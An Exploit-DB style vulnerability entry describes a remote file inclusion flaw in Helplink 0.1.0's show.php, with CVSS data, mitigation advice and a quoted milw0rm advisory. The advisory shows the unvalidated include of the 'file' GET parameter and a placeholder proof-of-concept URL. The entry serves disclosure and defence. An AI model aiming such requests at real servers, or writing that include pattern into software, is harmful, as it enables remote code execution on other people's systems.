Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability

vendor:

Helplink

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Helplink

Affected Version From: 0.1.0

Affected Version To: 0.1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability

The Helplink 0.1.0 show.php file is vulnerable to remote file inclusion. It includes a file based on the value of the 'file' parameter passed in the HTTP GET request without proper validation, allowing an attacker to include arbitrary files from remote servers.

Mitigation:

To mitigate this vulnerability, proper input validation and sanitization should be implemented to prevent unauthorized file inclusion. Additionally, the use of user-supplied input to include files should be avoided.

Source

Exploit-DB raw data:

##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability     #
# D.S : http://sourceforge.net/projects/helplink/                        #
# V.C                                                                    #
================================show.php=================================#
01 : <?                                                                  #
02 : /**                                                                 #
03 :  *      show.php - just throw some headers and footers around a file#
04 :  */                                                                 #
05 :                                                                     #
06 : include ('include.php');                                            #
07 : public_header();                                                    #
08 : include($HTTP_GET_VARS["file"]); <--- xxxx// Error !!               #
09 : public_footer();                                                    #
10 :                                                                     #
11 : ?>                                                                  #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3                                         #
##########################################################################

# milw0rm.com [2007-09-23]